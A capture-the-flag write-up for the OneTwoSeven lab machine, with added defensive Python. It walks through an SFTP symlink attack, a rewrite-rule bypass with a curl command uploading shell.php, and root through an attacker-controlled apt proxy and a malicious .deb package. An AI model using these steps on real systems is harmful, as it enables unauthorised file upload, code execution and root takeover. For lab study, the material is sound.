Always ping the machine before running the nmap scan.
A full port scan shows port 60080 as filtered, so we will keep that in mind.
WAF/Firewall Running
Some kind of firewall shuts down the web server after a certain number of requests. This happens when we send many requests at the same time, so we cannot run a gobuster scan.
We can poke around the website and start with manual enumeration.
When we click on the Signup today button, we get to this page with a set of credentials.
In computing, the SSH File Transfer Protocol is a network protocol that provides file access, file transfer, and file management over any reliable data stream. It was designed by the Internet Engineering Task Force as an extension of the Secure Shell protocol version 2.0 to provide secure file transfer capabilities.
Note:
1) Admin Link disabled - http://onetwoseven.htb:60080/
2) Interesting comments found on the source page
- Only enable link if access from trusted networks admin/20190212
- Added localhost admin/20190214
So admin access is only enabled from a trusted network, which in this case is localhost (127.0.0.1).
Enumerating SFTP (Secure File Transfer Protocol)
We can try to login to SSH using the given credentials.
Nope, that didn't work. Let's try the sftp command that is pre-installed in Kali.
We have this website http://onetwoseven.htb/~ots-lYmQ1YWI/ where we can upload files using the SFTP server. Let's see if this works properly. I will try to upload a basic HTML file.
Looks like we can upload a file and that file will be served by the web server.
But for some reason we can't upload a PHP file; if we try, we get the following error.
SFTP Symlink attack
There is a known SFTP weakness: inside a directory where we have read and write privileges we can create a symlink pointing anywhere on the filesystem. This is known as the SFTP symlink attack.
Read more about it here. Now we can try to list the root of the filesystem using the following command.
A symbolic link, also termed a soft link, is a special kind of file that points to another file, much like a shortcut in Windows or a Macintosh alias. Unlike a hard link, a symbolic link does not contain the data in the target file. It simply points to another entry somewhere in the file system.
symlink / root_file
We can only access the /var/www/html and /var/www/html-admin directories. So let's grab all the HTML/PHP files and start analyzing them.
This login.php file belongs to the administrator back-end running on port 60080 on localhost, so we need access to that. We can use SSH port forwarding.
#Code for addon manager
<?php
session_start();
if (!isset ($_SESSION['username'])) { header("Location: /login.php"); };
if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS Addon Manager
switch (true) {
    # Upload addon to addons folder.
    case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
        if(isset($_FILES['addon'])){
            $errors= array();
            $file_name = basename($_FILES['addon']['name']);
            $file_size =$_FILES['addon']['size'];
            $file_tmp =$_FILES['addon']['tmp_name'];
            if($file_size > 20000){
                $errors[]='Module too big for addon manager. Please upload manually.';
            }
            if(empty($errors)==true) {
                move_uploaded_file($file_tmp,$file_name);
                header("Location: /menu.php");
                header("Content-Type: text/plain");
                echo "File uploaded successfull.y";
            } else {
                header("Location: /menu.php");
                header("Content-Type: text/plain");
                echo "Error uploading the file: ";
                print_r($errors);
            }
        }
        break;
    # Download addon from addons folder.
    case preg_match('/\/addon-download.php/',$_SERVER['REQUEST_URI']):
        if ($_GET['addon']) {
            $addon_file = basename($_GET['addon']);
            if ( file_exists($addon_file) ) {
                header("Content-Disposition: attachment; filename=$addon_file");
                header("Content-Type: text/plain");
                readfile($addon_file);
            } else {
                header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
                die();
            }
        }
        break;
    default:
        echo "The addon manager must not be executed directly but only via<br>";
        echo "the provided RewriteRules:<br><hr>";
        echo "RewriteEngine On<br>";
        echo "RewriteRule ^addon-upload.php addons/ots-man-addon.php [L]<br>";
        echo "RewriteRule ^addon-download.php addons/ots-man-addon.php [L]<br><hr>";
        echo "By commenting individual RewriteRules you can disable single<br>";
        echo "features (i.e. for security reasons)<br><br>";
        echo "<font size='-2'>Please note: Disabling a feature through htaccess leads to 404 errors for now.</font>";
        break;
}
?>
So a request to addon-upload.php is rewritten to addons/ots-man-addon.php, and the same goes for addon-download.php. We can bypass this filter with the following request path: the download RewriteRule still matches it, because ^addon-download.php is not anchored at the end, while inside the script the first switch case, preg_match('/\/addon-upload.php/'), matches the same URI before the download case is ever reached.
/addon-download.php&/addon-upload.php
curl -X POST "http://localhost:60080/addon-download.php&/addon-upload.php" -F 'addon=@shell.php'
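As an added example, not code from the box or from this writeup, here is a small Python model of why the request above works and what a corrected router would do: both the .htaccess patterns and the preg_match calls are unanchored, so the handler is chosen by substring matching on REQUEST_URI rather than by which rewrite rule actually fired. The exact-path table and the file-name allow-list are assumptions for the hardened version.

```python
import re
from urllib.parse import urlsplit

# mod_rewrite patterns exactly as printed in the script's help text, keyed by
# feature; "disabling" a feature means removing it from the enabled set.
REWRITE_RULES = {"upload": r"^addon-upload.php", "download": r"^addon-download.php"}
# Order of the PHP switch(true): the upload case is evaluated first.
DISPATCH_PATTERNS = [("upload", r"/addon-upload.php"), ("download", r"/addon-download.php")]
# Exact paths for the hardened router (assumption: one fixed path per feature).
EXACT_PATHS = {"upload": "/addon-upload.php", "download": "/addon-download.php"}


def dispatch_original(request_uri, enabled):
    """Model of the page's routing: unanchored prefix match in .htaccess, then
    an unanchored preg_match over the full REQUEST_URI inside the script."""
    rel_path = urlsplit(request_uri).path.lstrip("/")  # per-directory rewrite context
    rewritten = any(re.match(REWRITE_RULES[f], rel_path) for f in enabled)
    if not rewritten and rel_path != "addons/ots-man-addon.php":
        return "404"  # neither a live rewrite rule nor the script's real path
    if "/addons/" in request_uri:
        return "die"  # the script's own guard against calling it directly
    for feature, pattern in DISPATCH_PATTERNS:
        if re.search(pattern, request_uri):
            return feature  # first match wins, regardless of which rule rewrote us
    return "help"


def dispatch_fixed(request_uri, enabled):
    """Hardened routing: compare the exact request path and serve only the
    feature whose rule is enabled, so a disabled rule cannot be reached."""
    path = urlsplit(request_uri).path
    for feature in enabled:
        if path == EXACT_PATHS[feature]:
            return feature
    return "404"


def is_safe_addon_name(file_name):
    """Check the upload handler lacks: a plain base name with a non-executable
    extension (constructed allow-list; the real set depends on the deployment)."""
    name = file_name.rsplit("/", 1)[-1]
    return bool(re.fullmatch(r"[A-Za-z0-9_-]+\.(txt|json|zip)", name))
```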
Python script to get a reverse shell
Configuring Burp Proxy for MITM Attack
We can run /usr/bin/apt-get update as well as /usr/bin/apt-get upgrade as the superuser. The interesting thing here is that we can point apt at any HTTP proxy we want, which means we can mount a MITM attack.
export http_proxy="http://10.10.14.5:1337"
So when we run apt-get update, the request goes to http://10.10.14.5:1337/, i.e. the Burp proxy, which then redirects it to our Python HTTP server listening on port 8000.
So when we run sudo apt-get update, we see the following requests on our web server.
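The privilege escalation only works because sudo passes the caller's proxy variables through to a root command that fetches over HTTP. As an added example, not part of this writeup, the following Python audit flags that combination in a sudoers file; the sudoers text and the list of network clients are constructed for the example.

```python
import re

# Constructed sample, not the target's file: a *_proxy variable survives
# sudo's env_reset while the caller may run apt-get as root.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += "http_proxy https_proxy"
www-data ALL=(root) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""

PROXY_VARS = {"http_proxy", "https_proxy", "ftp_proxy", "all_proxy",
              "HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "ALL_PROXY"}
# Clients that honour *_proxy (assumed list; extend for your fleet).
NETWORK_COMMANDS = {"/usr/bin/apt-get", "/usr/bin/apt", "/usr/bin/aptitude",
                    "/usr/bin/pip", "/usr/bin/wget", "/usr/bin/curl", "/usr/bin/git"}

_ENV_KEEP = re.compile(r'Defaults\S*\s+env_keep\s*\+?=\s*"?([^"]*)"?')
# user host=(runas) [TAG:]... command list
_RULE = re.compile(r"(\S+)\s+\S+\s*=\s*(?:\([^)]*\))?\s*(?:[A-Z]+:\s*)*(.+)")


def audit_sudoers(text):
    """One finding per (user, command) that runs a network client as root
    while proxy variables pass through from the caller's environment."""
    kept, rules = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if "!env_reset" in line:
            kept |= PROXY_VARS  # no reset at all: every variable is inherited
        elif (m := _ENV_KEEP.match(line)):
            kept.update(m.group(1).split())
        elif line.startswith("Defaults"):
            continue
        elif (m := _RULE.match(line)):
            user, cmds = m.group(1), m.group(2)
            for cmd in (c.strip() for c in cmds.split(",")):
                if cmd and cmd.split()[0] in NETWORK_COMMANDS:
                    rules.append((user, cmd))
    leaked = ",".join(sorted(kept & PROXY_VARS))
    if not leaked:
        return []
    return [f"{user} runs '{cmd}' as root with caller-controlled {leaked}"
            for user, cmd in rules]
```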
First, the top-level directory should be named telnet; it should contain a directory named DEBIAN, and the DEBIAN directory should contain two files: control and postinst.
control is almost the same as the Packages file, and postinst will contain our malicious code.
Now to create the deb file, run the following command in the terminal.
dpkg-deb --build telnet/
Now we still need to edit the Size and SHA256 in the Packages file.
Getting Root Access
Copy the Size and SHA256 sum and we are good to go. First, let's look at the directory structure.
Don't forget to compress the Packages file to Packages.gz using gzip.
Now we will run two commands: sudo apt-get update followed by sudo apt-get upgrade.